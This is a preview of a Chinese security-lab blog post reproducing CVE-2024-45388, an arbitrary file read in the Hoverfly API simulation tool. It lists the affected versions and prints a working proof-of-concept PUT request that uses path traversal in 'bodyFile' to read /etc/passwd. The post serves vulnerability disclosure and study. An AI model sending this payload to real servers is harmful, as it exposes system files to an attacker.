今天看啥  ›  专栏  ›  弥天安全实验室

【成功复现】SpectoLabs hoverfly任意文件读取漏洞(CVE-2024-45388)

弥天安全实验室  · 公众号  ·  · 2024-10-14 18:44
    

文章预览

网安引领时代,弥天点亮未来       0x00写在前面       本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责! 0x01漏洞介绍 Hoverfly是SpectoLabs开源的一种轻量级的开源 API 模拟工具。 Hoverfly v1.10.3之前版本存在安全漏洞。攻击者利用该漏洞可以从服务器读取任意文件。 0x02影响版本 github.com/spectolabs/hoverfly < 1.10.3 github.com/SpectoLabs/hoverfly < 1.10.3 0x03漏洞复现 1.访问漏洞环境 漏洞poc PUT /api/v2/simulation HTTP/1.1 Host : 127.0.0.1 User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0 Connection : close Content-Length : 137 Content-Type : application/x-www-form-urlencoded Accept-Encoding : gzip { "data" :{ "pairs" :[{ "request" :{}, "response" :{ "bodyFile" : "../../../../../../../etc/passwd" , "x" : "aaa" }} ]}, "meta" :{ "schemaVersion" : "v5.3" }} 0x04修复建议 目前厂商已发布升级补丁 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览